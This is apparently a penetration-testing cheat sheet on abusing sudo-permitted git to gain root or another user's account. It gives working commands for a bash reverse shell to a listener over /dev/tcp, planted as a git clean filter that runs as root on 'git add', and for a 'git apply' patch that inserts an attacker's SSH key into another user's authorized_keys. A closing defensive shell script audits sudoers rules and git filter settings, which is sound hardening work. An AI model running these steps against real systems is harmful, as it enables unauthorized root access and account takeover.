Sudo Git Privilege Escalation
If git can be run with sudo, it can be abused for privilege escalation.
Git Add/Commit
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
If we can add to and commit the git repository as root, we may be able to escalate privileges.
Exploitation
Create a Payload
echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
Set Git Config
# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
The clean filter command runs whenever a file matching the attribute pattern (here *.php) is staged, so it executes with the privileges of whoever runs git add.
Commit the Repository
Before committing, we need to start a listener on the local machine.
nc -lvnp 4444
Then commit with sudo.
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Now we should get a shell in the local terminal.
Git Apply
sudo /usr/bin/git apply *
If we can apply a patch to the git repository as root, we can overwrite the contents of arbitrary files.
Exploitation with SSH Keys
Assume we are currently the "user1" user and want to escalate to "user2". First we create a new SSH key pair.
cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsa
New SSH keys (private/public) are generated under /home/user1.
Next, add the content of id_rsa.pub to authorized_keys.
cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keys
Then create a patch.
cd /home
git diff user1/.bash_history user1/.ssh/authorized_keys > /tmp/patch
After that, replace the name "user1" with "user2" in the patch file.
sed -i 's/user1/user2/g' /tmp/patch
Now we can apply the patch as root. This command updates the target user's ("user2") authorized_keys so that we can log in over SSH as "user2" with our key.
sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/.ssh/id_rsa user2@example.com
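As an added defender-side check that is not part of the original notes, this POSIX shell script flags the sudo rules used in the Git Add/Commit and Git Apply sections above (a wildcard argument, or a --work-tree that lets repository-configured filters run as root) and lists the filter.<name>.clean/.smudge commands set in a repository's config file. The sudoers lines and git config it scans are constructed samples written to a temporary directory.

```shell
#!/bin/sh
# Added audit helper, not part of the original notes. It looks for the two
# conditions the write-up above depends on: sudo rules that expose git
# (especially with a wildcard or a --work-tree), and git filter drivers
# (filter.<name>.clean / .smudge) that run an arbitrary command on add/checkout.
# The sample sudoers and git config below are constructed for this example.

SAMPLE_DIR=$(mktemp -d)
printf '%s\n' \
  'user1 ALL=(root) NOPASSWD: /usr/bin/git apply *' \
  'user1 ALL=(root) NOPASSWD: /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A' \
  'user1 ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx' > "$SAMPLE_DIR/sudoers"
printf '[core]\n\trepositoryformatversion = 0\n[filter "indent"]\n\tclean = /tmp/revshell\n\tsmudge = cat\n[remote "origin"]\n\turl = https://example.invalid/repo.git\n' > "$SAMPLE_DIR/config"

# Classify every sudoers line that grants git: WILDCARD (e.g. "git apply *",
# which lets the caller patch any root-owned file), WORKTREE (git add/commit
# will run the repository's configured filter commands as root), or GIT-RULE.
audit_sudoers_git() {
    grep -E '(^|[[:space:]/])git([[:space:]]|$)' "$1" | while IFS= read -r line; do
        case "$line" in
            *\**)            echo "WILDCARD: $line" ;;
            *--work-tree=*)  echo "WORKTREE: $line" ;;
            *)               echo "GIT-RULE: $line" ;;
        esac
    done
}

# List filter.<name>.clean / .smudge commands from a git config file
# (e.g. /opt/example/.git/config). Every entry is a command git will execute;
# on a sudo-exposed repository each one must be root-controlled.
audit_git_filters() {
    awk '
        /^[ \t]*\[filter[ \t]+"/ {            # [filter "name"] section header
            name = $0
            sub(/^[ \t]*\[filter[ \t]+"/, "", name); sub(/".*$/, "", name); next
        }
        /^[ \t]*\[/ { name = ""; next }       # any other section ends the filter
        name != "" && /^[ \t]*(clean|smudge)[ \t]*=/ {
            eq = index($0, "=")
            key = substr($0, 1, eq - 1); gsub(/[ \t]/, "", key)
            cmd = substr($0, eq + 1);    sub(/^[ \t]+/, "", cmd)
            printf "filter.%s.%s runs: %s\n", name, key, cmd
        }
    ' "$1"
}

audit_sudoers_git "$SAMPLE_DIR/sudoers"
audit_git_filters "$SAMPLE_DIR/config"
```

Point the two functions at the real /etc/sudoers (and /etc/sudoers.d/*) and at the .git/config of any repository named in a sudo rule; a filter command living in a world-writable location such as /tmp is the finding to act on.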